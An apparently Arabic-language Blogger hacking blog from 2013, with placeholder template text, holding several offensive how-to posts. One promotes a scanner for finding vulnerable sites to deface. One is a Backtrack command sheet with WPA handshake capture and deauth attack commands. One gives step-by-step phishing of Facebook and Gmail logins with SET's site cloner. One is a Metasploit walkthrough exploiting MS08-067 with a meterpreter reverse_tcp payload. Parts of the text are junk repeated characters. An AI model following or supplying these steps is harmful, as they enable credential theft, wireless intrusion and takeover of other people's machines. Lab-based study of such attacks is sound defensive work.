This is default featured slide 1 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.This theme is Bloggerized by Lasantha Bandara - Premiumbloggertemplates.com.

This is default featured slide 2 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.This theme is Bloggerized by Lasantha Bandara - Premiumbloggertemplates.com.

This is default featured slide 3 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.This theme is Bloggerized by Lasantha Bandara - Premiumbloggertemplates.com.

This is default featured slide 4 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.This theme is Bloggerized by Lasantha Bandara - Premiumbloggertemplates.com.

This is default featured slide 5 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.This theme is Bloggerized by Lasantha Bandara - Premiumbloggertemplates.com.

‏إظهار الرسائل ذات التسميات Backtrack. إظهار كافة الرسائل
‏إظهار الرسائل ذات التسميات Backtrack. إظهار كافة الرسائل

الثلاثاء، 10 ديسمبر 2013

IP-Digger V2


IP Digger is a free pentesting tool for finding the Vulnerable websites on the Particular IP Address Given By the Attacker :) . As it is the first tool of the Freak Coderz first =))
It works perfectly on Backtrack 5 r3 :)) 
+++++++++++++++++++++++++++++++++++++++++++++
Project Name :- IP-Digger v2.0 
+++++++++++++++++++++++++++++++++++++++++++++

IP-Digger is for the Hackers or we can pentesters or the web admins who want to find the vulnerable websites if they have the Shared hosting. This tool can minimize the risk of getting hacked by finding the Several Vulnerable websites.
For Hackers it is a great tool for finding the vulnerable website in their Target and exploit it and then Easily defacing :)
Tool Name :- IP-Digger v2.0 The Disaster
Coded by :- (HHA) Emi Haxor ( Pakistani Hackers )
Features of IP - Digger
1) ADVANCE SQLI Vulnerable Website Finder
2) ADVANCEXSS Vulnerable Website Finder
3) ADVANCELFI Vulnerable Website Finder
4) ADVANCERFI Vulnerable Website Finder
5) ADVANCE Admin Panels
6) ADVANCE Upload Vulnerability sites finder
7) ASP SERVER BASED SCRIPT ADDED
 Joomla and Wordpress website finder
9 BUgs LeeCher section added
Download Link :-
-------------------------------------
--------------------------------------------
Everyones suggestions will be appreciated :)

الثلاثاء، 19 نوفمبر 2013

Backtrack Commands Terminal



1) PROGRAMS :-
                              1. Vlc = Video/Music
                              2. Flash Plugin = BT5 Forums
                              3. Feh = Picture Viewer
                              4. Easytether = Android Tethering
                              5. Bless = Hex Editor
                              6. Gparted = HDD partition Editor
                              7. Transmission = Torrent Client
                              8. Crunch = Passwordlist generator


2) Commands = Action **** = your input

root:toor
startx = GUI
alsamixer = Volume Control
cd = change working directory
reboot = reboot
poweroff = shutdown
rfkill list = wifi problems
rfkill unblock all = wifi on
rm /***/** = delete file
rm -rf /****/** = harsh delete
iwconfig = wireless config/list
ifconfig = wired config/list

3) TASKKILLER :-

kill **** = PID number
4) BLUETOOTH :-

hciconfig hci0 up = on
hciconfig hci0 = info
hcitool scan hci0 = find devices
5) ANDROID TETHERING :-

easytether connect
***new konsole
dhclient eaytether0

6) INSTALL PROGRAMS :-

aptitude install **** =install
apt-get **** = install
apt-get update = update repos
apt-get remove [--purge] **** = uninstall plue dependencies
apt-cache search = search repos
7) WPACRACKING :-

rfkill unblock all = start wifi
airmon-ng start wlan0 = start monitor mode
airdump-ng mon0 = monitor all
airdump-ng -c *channel --*****bssid -w psk mon0 = catch handshake
aireplay-ng -0 5 -a****acsespoint -c ***conectdcomp mon0 = deauth attack
mdk3 = stronger deauth attack
akashpuriakashpuriakashpuriakashpuriakashpuriakashpuriakashpuriakashpuriakashpuri 
akashpuriakashpuriakashpuriakashpuriakashpuriakash

الثلاثاء، 10 سبتمبر 2013

Hacking Facebook ,Gmail account using Backtrack and SET

Hacking Facebook ,Gmail account using Backtrack and SET


Hello, friends i am back with a latest post on hacking facebook,gmail accounts using backtrack and social engineering kit.Things you needed are following:—> 1. Backtrack 5 R2 2. Internet connection 3. A brain Now follow all my steps like i am showing in this post:—–>
1. First open the social engineering kit using this command in cd /pentest/exploits/set and then press enter and then type ./set and hit enter like in image.
2. Now type 1 to select Social-Engineering Attacks and hit enter as in image.
3. Now type 2 to select Website Attack Vectors and hit enter as in image.
4. Now type 4 to select Tabnabbing Attack Method and hit enter.
5. Now type 2 to select Site Cloner and hit enter.
6. Now enter the site address whom which you want to create fake pages.
7. Now ti will start cloning the site. 8. Now send ur ip address as a link to victim.
9. Now when victim click on it he/she get the fake page and when he fill the details he will got hacked. Note : its for educational purpose.

الثلاثاء، 20 أغسطس 2013

[Metasploit Tutorial] Hacking Windows XP using IP Address

[Metasploit Tutorial] Hacking Windows XP using IP Address



Do you think it is possible to hack some one computer with just an ip address?! The answer is yes, if you are using unpatched(vulnerable) OS.  If you don't believe me, then read the full article.

In this article i am going to demonstrate how to hack a remote computer by exploiting the  parsing flaw in the path canonicalization code of NetAPI32.dll through the Server Service(CVE-2008-4250). Before we jump into the actual exploitation process, let me give more details about this Server ServiceVulnerability.

Details about Server Service Vulnerability(MS08-067):
Microsoft Windows Server service provides support for sharing resources such as files and print services over the network.

The Server service is vulnerable to a remote code-execution vulnerability. The vulnerability is caused due to an error in netapi32.dll when processing directory traversal character sequences in path names. This can be exploited to corrupt stack memory by e.g. sending RPC requests containing specially crafted path names to the Server Service component. The 'NetprPathCanonicalize()' function in the 'netapi32.dll' file is affected.

A malicious request to vulnerable system results in complete compromise of vulnerable computers.
This vulnerability affects Windows XP, Windows 2000, Windows Server 2003, Windows Vista, and Windows Server 2008. But Attackers require authenticated access on Windows Vista and Server 2008 platforms to exploit this issue.

Exploiting the MS08-067 using Metasploit:

Requirements:
  • VirtualBox
  • Backtrack 5
  • Target OS(XP)
Step 1:

Create Two Virtual Machine(VM) namely "Target" and "BT5".  Install the XP inside Target VM and Backtrack inside BT5. Start the Two VMs.

If you don't know how to create virtual machines , then please read this VirtualBox Manual.

Step 2: Find the IP address of Target
Open The command prompt in the Target machine(XP). Type "ipconfig" to find the IP address of the Target system.

Hackers use different method for finding the ip address of victim.  For Eg., By sending link that will get the ip  details or use Angry IP Scanner.

Step 3: Information Gathering
Now let us collect some information about the Target machine.  For this purpose , we are going to use the nmap tool.

Open The Terminal in the BT5 machine(Backtrack) and type "nmap -O 192.168.56.12".  Here 192.168.56.12 is IP address of Target machine. If you look at the result, you can find the list of open ports and OS version.


Step 4: Metasploit
Now open the Terminal in the BT5 machine(Backtrack) and Type "msfconsole".

The msfconsole is the most popular interface to the Metasploit Framework. It provides an "all-in-one" centralized console and allows you efficient access to virtually all of the options available in the Metasploit Framework.

Let us use the Search command to find the exploit modules with the keyword netapi. Type "search netapi".  Now you can see the list of modules match with the netapi.


We are going to exploit MS08-067 , so type "use exploit/windows/smb/ms08_067_netapi".

Step 5: Set Payload
As usual, let use the Reverse Tcp Payload for this exploit also. Type "set payload windows/meterpreter/reverse_tcp" in the msfconsole.

Step 6: Options
Type "set LHOST 192.168.56.10".  Here 192.168.56.10 is IP address of Backtrack machine.  You can find the ip address by typing 'ifconfig' command in the Terminal.

Type "set RHOST 192.168.56.12".  Here 192.168.56.12 is IP address of Target machine.

Step 7: Exploiting
Ok, it is time to exploit the vulnerability, type "exploit" in the console. If the exploit is successful, you can see the following result.

Now we can control the remote computer using the meterpreter. For example, typing "screenshot" will grab the screenshot of the victim system.

CounterMeasures:
Update your OS frequently.